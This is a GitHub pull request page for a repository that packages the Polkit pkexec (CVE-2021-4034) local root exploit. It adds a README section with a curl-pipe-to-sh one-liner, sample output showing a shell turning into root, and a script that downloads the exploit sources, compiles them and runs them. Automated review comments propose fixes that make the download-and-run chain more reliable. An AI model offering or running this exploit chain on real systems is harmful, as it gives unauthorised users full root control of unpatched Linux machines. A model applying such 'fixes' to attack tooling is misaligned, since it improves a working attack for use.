Merge pull request #18 from berdav/pr-12-one-line-root

one line root with fixes
Davide Berardi 2022-01-29 11:37:17 +01:00 committed by GitHub
commit e5cf2e41c3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 36 additions and 0 deletions


@ -62,3 +62,23 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
## About Polkit pkexec for Linux ## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One command root
You can easily exploit the system using a single script, downloadable and executable with this command:
`curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh`
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
```
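
Review bot: the one-liner under `# One command root` pipes a script fetched from the mutable `main` branch straight into `sh`, so a reader runs whatever that branch holds at that moment without seeing it first, and that script in turn downloads, builds and runs more code. Suggest pinning the URL to a commit hash instead of `main` and documenting a two-step form (download to a file, read it, then run it). The sample output also shows that `cc` and `make` are required, which the text does not mention. Style: the new heading is level 1 while the preceding section uses `##`.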

cve-2021-4034.sh Executable file

@ -0,0 +1,16 @@
#!/usr/bin/env sh
set -e
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
for EXPLOIT in "${URL}/cve-2021-4034.c" \
"${URL}/pwnkit.c" \
"${URL}/Makefile"
do
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done
make
./cve-2021-4034
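
Review bot: on the `curl -sLO "$EXPLOIT" || wget ...` line, curl is called without `-f`, so an HTTP error response (for example a 404 page) is saved under the source file name with exit status 0; the wget fallback never runs and `set -e` does not stop the script before `make`. Suggest `curl -fsSLO` so a failed fetch is reported and aborts the run. The files, including `Makefile`, are also written into whatever directory the caller happens to be in and silently overwrite same-named files there; creating and entering a `mktemp -d` directory first avoids that. Minor: `URL` already ends in `/`, so `"${URL}/pwnkit.c"` produces a double slash.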